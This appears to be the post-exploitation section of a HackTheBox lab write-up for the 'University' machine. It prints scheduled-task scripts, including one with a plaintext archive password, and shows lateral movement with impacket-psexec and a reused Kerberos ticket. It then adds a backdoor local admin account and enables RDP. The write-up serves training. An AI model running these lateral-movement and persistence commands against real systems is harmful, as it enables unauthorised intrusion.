Beyond
This is the beyond page that an additional post enumeration and assessment are conducted as the SYSTEM after compromising the target domain
Scheduled Task (dc.university.htb)
PS C:\Windows\system32> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
TaskName TaskPath State
-------- -------- -----
DB Backup \ Ready
MonitorFile \ Ready
Rose.L simulator \ Running
Start nginx \ Running
Start web-application(university.htb) \ Running
start-VMs \ ReadyDB Backup
PS C:\Windows\system32> schtasks /QUERY /TN "\DB Backup" /V /FO LIST
Folder: \
HostName: DC
TaskName: \DB Backup
Next Run Time: 11/25/2024 5:19:27 PM
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 11/30/1999 12:00:00 AM
Last Result: 267011
Author: UNIVERSITY\Administrator
Task To Run: powershell -ExecutionPolicy ByPass -File "C:\Web\DB Backups\db-backup-automator.ps1"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: WAO
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: Monthly
Start Time: 5:19:27 PM
Start Date: 1/16/2023
End Date: N/A
Days: 25
Months: Every month
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: DisabledC:\Web\DB Backups\db-backup-automator.ps1
C:\Web\DB Backups\db-backup-automator.ps1
PS C:\Windows\system32> cat "C:\Web\DB Backups\db-backup-automator.ps1"
$sourcePath = "C:\Web\University\db.sqlite3"
$destinationPath = "C:\Web\DB Backups\"
$7zExePath = "C:\Program Files\7-Zip\7z.exe"
$zipFileName = "DB-Backup-$(Get-Date -Format 'yyyy-MM-dd').zip"
$zipFilePath = Join-Path -Path $destinationPath -ChildPath $zipFileName
$7zCommand = "& `"$7zExePath`" a `"$zipFilePath`" `"$sourcePath`" -p'WebAO1337'"
Invoke-Expression -Command $7zCommandMonitorFile
PS C:\Windows\system32> schtasks /QUERY /TN "\MonitorFile" /V /FO LIST
Folder: \
HostName: DC
TaskName: \MonitorFile
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 11/2/2024 4:31:49 PM
Last Result: 0
Author: N/A
Task To Run: powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Program Files\Automation-Scripts\flag.ps1"
Start In: N/A
Comment: Monitors a file
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/AC:\Program Files\Automation-Scripts\flag.ps1
C:\Program Files\Automation-Scripts\flag.ps1
PS C:\Windows\system32> cat "C:\Program Files\Automation-Scripts\flag.ps1"
cat : Cannot find path 'C:\Program Files\Automation-Scripts\flag.ps1' because it does not exist.
At line:1 char:1
+ cat "C:\Program Files\Automation-Scripts\flag.ps1"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (C:\Program File...cripts\flag.ps1:String) [Get-Content], ItemNotFoundEx
ception
+ FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommandRose.L simulator
PS C:\Windows\system32> schtasks /QUERY /TN "\Rose.L simulator" /V /FO LIST
Folder: \
HostName: DC
TaskName: \Rose.L simulator
Next Run Time: N/A
Status: Running
Logon Mode: Interactive/Background
Last Run Time: 11/2/2024 6:39:49 PM
Last Result: -2147020576
Author: UNIVERSITY\Administrator
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Automation-Scripts\script.ps1"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: Rose.L
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DC
TaskName: \Rose.L simulator
Next Run Time: N/A
Status: Running
Logon Mode: Interactive/Background
Last Run Time: 11/2/2024 6:39:49 PM
Last Result: -2147020576
Author: UNIVERSITY\Administrator
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Automation-Scripts\script.ps1"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: Rose.L
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/AC:\Program Files\Automation-Scripts\script.ps1
C:\Program Files\Automation-Scripts\script.ps1
PS C:\Windows\system32> cat "C:\Program Files\Automation-Scripts\script.ps1"
$output = ""
while ($output -notmatch "rose"){
sleep 90
$output = $(Invoke-Command -ComputerName WS-3 -Command {whoami} -Authentication Kerberos -ErrorAction Ignore)+"X"
}Start nginx
PS C:\Windows\system32> schtasks /QUERY /TN "\Start nginx" /V /FO LIST
Folder: \
HostName: DC
TaskName: \Start nginx
Next Run Time: N/A
Status: Running
Logon Mode: Interactive/Background
Last Run Time: 11/2/2024 4:30:27 PM
Last Result: 267009
Author: UNIVERSITY\Administrator
Task To Run: C:\Web\nginx-1.24.0\start.bat
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: WAO
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/AC:\Web\nginx-1.24.0\start.bat
C:\Web\nginx-1.24.0\start.bat
*Evil-WinRM* PS C:\Windows\system32> cat C:\Web\nginx-1.24.0\start.bat
@ECHO OFF
cd C:\Web\nginx-1.24.0\
.\nginx.exeStart web-application(university.htb)
PS C:\Windows\system32> schtasks /QUERY /TN "\Start web-application(university.htb)" /V /FO LIST
Folder: \
HostName: DC
TaskName: \Start web-application(university.htb)
Next Run Time: N/A
Status: Running
Logon Mode: Interactive/Background
Last Run Time: 11/2/2024 4:30:27 PM
Last Result: 267009
Author: UNIVERSITY\Administrator
Task To Run: C:\Web\University\start-server.bat
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: WAO
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/AC:\Web\University\start-server.bat
C:\Web\University\start-server.bat
*Evil-WinRM* PS C:\Windows\system32> cat C:\Web\University\start-server.bat
@ECHO OFF
cd C:\Web\University
"C:\Program Files\Python310\python.exe" -u .\manage.py runserver --noreload --no-color --skip-checksstart-VMs
*Evil-WinRM* PS C:\Windows\system32> schtasks /QUERY /TN "\start-VMs" /V /FO LIST
Folder: \
HostName: DC
TaskName: \start-VMs
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 11/2/2024 4:30:07 PM
Last Result: 0
Author: UNIVERSITY\Administrator
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File "C:\Program Files\Automation-Scripts\start-vms.ps1"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/AC:\Program Files\Automation-Scripts\start-vms.ps1
C:\Program Files\Automation-Scripts\start-vms.ps1
*Evil-WinRM* PS C:\Windows\system32> cat "C:\Program Files\Automation-Scripts\start-vms.ps1"
Start-VM -Name WS-3,LAB-2Services (dc.university.htb)
C:\Windows\system32> wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"
VMware Alias Manager and Ticket Service VGAuthService "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" Auto
VMware Tools VMTools "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" Auto Hyper-V
PS C:\Windows\system32> Get-VM
Name State CPUUsage(%) MemoryAssigned(M) Uptime Status Version
---- ----- ----------- ----------------- ------ ------ -------
LAB-2 Running 0 512 02:14:09.4170000 Operating normally 9.0
WS-3 Running 0 1500 02:14:09.4820000 Operating normally 9.0LAB-2WS-3
PS C:\Windows\system32> ls C:\Users\Administrator\Documents\VMs
Directory: C:\Users\Administrator\Documents\VMs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/2/2024 6:22 PM 3560964096 LAB-2.vhdx
-a---- 11/2/2024 6:47 PM 13256097792 WS-3.VHDXws-3.university.htb
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ KRB5CCNAME=choco.l@dc.university.htb.ccache sudo proxychains -q impacket-psexec UNIVERSITY.HTB/@ws-3.university.htb -k -no-pass -dc-ip 192.168.99.1
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on ws-3.university.htb.....
[*] Found writable share ADMIN$
[*] Uploading file WKDdcJns.exe
[*] Opening SVCManager on ws-3.university.htb.....
[*] Creating service sBFS on ws-3.university.htb.....
[*] Starting service sBFS.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
WS-3
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet 3:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::349:6988:18c6:65c6%8
IPv4 Address. . . . . . . . . . . : 192.168.99.2
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : impacket-psexec over reverse socks proxy
C:\Windows\system32> net user /ADD adm1n Qwer1234
The command completed successfully.
C:\Windows\system32> net localgroup "Administrators" /ADD adm1n
The command completed successfully.
C:\Windows\system32> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.Enabling RDP
┌──(kali㉿kali)-[~/archive/htb/labs/university]
└─$ sudo proxychains4 -q xfreerdp /u:adm1n /p:Qwer1234 /v:192.168.99.2 /cert:ignore /dynamic-resolution /tls-seclevel:0
RDP over reverse socks proxy
Scheduled Tasks (ws-3.university.htb)
PS C:\Windows\system32> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
TaskName TaskPath State
-------- -------- -----
Content Evaluator(Professor Simulator) \ Ready
CreateExplorerShellUnelevatedTask \ Ready
User_Feed_Synchronization-{7DEA4812-3060-4029-984A-246BC908C4F9} \ Ready
User_Feed_Synchronization-{9E0BFBEC-D348-437C-9897-38EC31E938FE} \ Ready
User_Feed_Synchronization-{AE801ACA-3FD6-4D8C-84D5-1F16359C9921} \ Ready
wpad cache cleaner \ ReadyContent Evaluator(Professor Simulator)
PS C:\Windows\system32> schtasks /QUERY /TN "\Content Evaluator(Professor Simulator)" /V /FO LIST
Folder: \
HostName: WS-3
TaskName: \Content Evaluator(Professor Simulator)
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive only
Last Run Time: 11/2/2024 7:47:49 PM
Last Result: 0
Author: UNIVERSITY\Administrator
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy ByPass -File "C:\Program Files\Automation-Scripts\get-lectures.ps1"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: Martin.T
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/AC:\Program Files\Automation-Scripts\get-lectures.ps1
C:\Program Files\Automation-Scripts\get-lectures.ps1
PS C:\Windows\system32> cat "C:\Program Files\Automation-Scripts\get-lectures.ps1"
$DC_IP =$(Get-DnsClientServerAddress -AddressFamily IPv4 -InterfaceIndex 8).ServerAddresses
$lectures = $(curl "http://university.htb/api/get_verified_uploaded_lectures/" -Proxy $("http://"+$DC_IP)).content
$lectures_list = $lectures -split "`n"
for ($i= 0; $i -lt ($lectures_list.Count-1); $i++ ){
$lec_path = "\\"+$DC_IP+"\Lectures\"+$lectures_list[$i]
cp $lec_path C:\Users\Public\Lectures\
}
$files_list = Get-ChildItem -Path C:\Users\Public\Lectures\ -Filter "*.zip" -File
foreach ($file in $files_list) {
$mimetype = ((& 'C:\Program Files\Trid\trid.exe' -n:1 $file.FullName) -split "`n")[-1]
if ($mimetype -match "ZIP compressed archive"){
rm ~\Desktop\Lecture -Recurse
Expand-Archive -Path $file.FullName -DestinationPath ~\Desktop\Lecture
$url_files_list = Get-ChildItem -Path ~\Desktop\Lecture -Filter "*.url" -File
foreach ($url_file in $url_files_list) {
$url_file_mimetype = ((& 'C:\Program Files\Trid\trid.exe' -n:1 $url_file.FullName) -split "`n")[-1]
if ($url_file_mimetype -match "Windows URL shortcut"){
start $url_file.FullName
}
}
}
rm $file.FullName
}
Get-ChildItem ~\Desktop\Lecture | Remove-Item -Recurse -Forcewpad cache cleaner
PS C:\Windows\system32> schtasks /QUERY /TN "\wpad cache cleaner" /V /FO LIST
Folder: \
HostName: WS-3
TaskName: \wpad cache cleaner
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 11/2/2024 7:35:40 PM
Last Result: 0
Author: WS-3\Administrator
Task To Run: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Executionpolicy Bypass -File "C:\Program Files\Automation-Scripts\wpad-cache-cleaner.ps1"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: Administrator
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/AC:\Program Files\Automation-Scripts\wpad-cache-cleaner.ps1
C:\Program Files\Automation-Scripts\wpad-cache-cleaner.ps1
PS C:\Windows\system32> cat "C:\Program Files\Automation-Scripts\wpad-cache-cleaner.ps1"
$process = Get-Process -Name systemsettings
if ($process) {
$process | Stop-Process -Force
}
sc.exe stop wuauserv
Set-DnsClientServerAddress -InterfaceIndex 8 -ServerAddresses ::1
disable-NetAdapter -Name "Ethernet 3" -Confirm:$false
sleep 2
enable-NetAdapter -Name "Ethernet 3"
ipconfig /flushdns
sleep 17
Set-DnsClientServerAddress -InterfaceIndex 8 -ServerAddresses fe80::215:5dff:fe05:8007Services (ws-3.university.htb)
PS C:\Windows\system32> wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows"N/A